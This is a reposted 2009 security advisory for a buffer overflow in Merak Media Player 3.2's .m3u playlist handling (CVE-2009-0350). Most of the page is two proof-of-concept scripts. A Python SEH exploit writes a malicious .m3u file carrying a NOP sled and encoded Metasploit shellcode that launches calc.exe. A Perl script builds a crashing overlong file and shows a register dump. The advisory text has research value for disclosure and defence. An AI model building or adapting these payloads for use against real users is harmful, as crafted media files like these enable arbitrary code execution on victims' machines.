|
Feeds -
Exploits
|
|
Written by Houssamix
|
|
Monday, 02 March 2009 22:43 |
Merak Media Player '.m3u' File Remote Buffer Overflow Vulnerability
-\\Bugtraq ID:
33419
-\\Class:
Boundary Condition Error
-\\CVE:
CVE-2009-0350
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Jan 25 2009 12:00AM
-\\Updated:
Mar 02 2009 04:06PM
-\\Credit:
Houssamix
-\\Vulnerable:
Qwerks Merak Media Player 3.2
-\\Discussion
Merak Media Player is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Merak Media Player 3.2 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
The following proof-of-concept and exploit code samples are available:
===============================================================
33419-2.pl
^^^^^^^^^^^
#exploit.py
#
# Merak Media Player 3.2 Buffer Overflow Exploit(SEH)
# By:Encrypt3d.M!nd
# m1nd3d.wordpress.com
#
# Orginal Advisory:
# http://www.milw0rm.com/exploits/7857
######################################################
# Nothing Intersting in this exploit,too easy
# just improving my SEH exploitation Skills :p
#
ns = "\xEB\x06\x90\x90"
sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2
chars = "A" * 74
nops = "\x90" * 20
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum
http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a")
file=open('geek.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()
===============================================================
33419.pl
^^^^^^^^^
#!/usr/bin/perl -w
# Author : Houssamix
# Merak Media Player V3.2 m3u file Local Buffer overflow (SEH)
# Download : http://www.qwerks.com/download/3748/merak.zip
# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545
# 0013FBE4 42424242 Pointer to next SEH record
# 0013FBE8 45454545 SE handler
# ---------------------------------------------
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Merak Media Player V3.2 m3u file Local Buffer overflow (SEH) \n";
print "===================================================================== \n";
my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Merak Media Player
http://www.qwerks.com/product/3748.htm (Qwerks)
|
